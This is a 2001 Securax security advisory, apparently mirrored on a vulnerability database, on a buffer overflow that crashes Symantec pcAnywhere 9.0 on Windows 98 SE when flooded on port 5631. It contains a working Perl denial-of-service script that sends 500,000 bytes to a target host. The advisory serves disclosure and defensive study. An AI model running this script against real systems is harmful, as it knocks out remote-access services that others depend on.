`=============================================================================
Securax-SA-14 Security Advisory
belgian.networking.security Dutch
=============================================================================
Topic: Symantec pcAnywhere 9.0 DoS / Buffer Overflow
Announced: 2001-02-08
Affects: Symantec PcAnywhere 9.0 on Microsoft Windows 98 SE
=============================================================================
Note: This entire advisory has been based upon trial and error results. We
can not ensure the information below is 100% correct being that we do
not have any source code to audit. This document is subject to change
without prior notice.
If you happen to find more information / problems concerning the below
problem or further varients please contact me on the following email
[email protected], or you can contact [email protected].
I. Problem Description
-----------------------
Symantec PcAnywhere is a program that will allow others (who are authorised
to have access :)) to use your pc. It's simular to a Windows NT 4.0 terminal
server.
PcAnywhere (when it's configured to 'be a host pc') listens on 2 ports, 5631
(pcanywheredata, according to nmap) and 65301 (pcanywhere). And when a user
sends certain data in a particular way, pcAnywhere will crash.
When a large amount (it depends, sometimes the host will go down with 320k
characters, sometimes, you will have to send 500k bytes of data) are sent to
a 'waiting' host on the pcanywheredata port, "AWHOST32.EXE" will crash, and
give an error on the screen, and write the "Unexpected program error" to a
logfile. (with EAX, EBX, ... so read them, you'll find the yummy 0x61616161)
Oh yeah, don't use uppercase characters, as PcAnywhere won't crash on them.
Why no exploit, just a lame Denial of Service?
1.) because I suck in win32 debugging / overflowing (but i'm reading)
/* so if I can overflow win32 progs, i'll code an exploit */
2.) as the amount of data is variable, it's hard to overflow..
The DoS code:
<--bof-->
#!/usr/bin/perl
# Symantec PcAnywhere 9.0 Denial of Service
# -----------------------------------------
# by incubus <[email protected]>
# http://www.hexyn.be
#
# http://www.securax.net
# All my love to Tessa.
# Greetz to: f0bic, r00tdude, t0micron, senti, vorlon, cicero,
# Zym0tic, segfault, #[email protected]
# Thanks to jurgen swennen, for letting me (ab)use his computer.
#
# this is intended as proof of concept, do not abuse!
use IO::Socket;
$host = "$ARGV[0]";
$port = 5631;
if ($#ARGV<0) {
print "use it like: $0 <hostname>\n";
exit();
}
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$host,
PeerPort=>$port) || die "damn, ";
print "hello\n";
$buf = "";
for($counter = 0; $counter < 500000; $counter++) {
$buf .= "\x61";
}
print $socket "$buf\n";
close($socket);
exit();
<--eof-->
II. Impact
----------
If someone exploits this, than Symantec is forced to rename the name of this
product to PcAnyoneAnywhere or something...
No, seriously, this could lead to a compromise of a system.
III. possible workarounds
-------------------------
This advisory was also sent to Symantec ([email protected]), we'll see what
they do with it...
IV credits
----------
love to Tessa.
greetz go out to : f0bic, r00t, Zym0t1c, vorlon, cicer0, tomicron, segfau|t,
and so many, many others I forgot...
=============================================================================
For more information [email protected]
Website http://www.securax.org
Advisories/Text http://www.securax.org/pers
-----------------------------------------------------------------------------
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation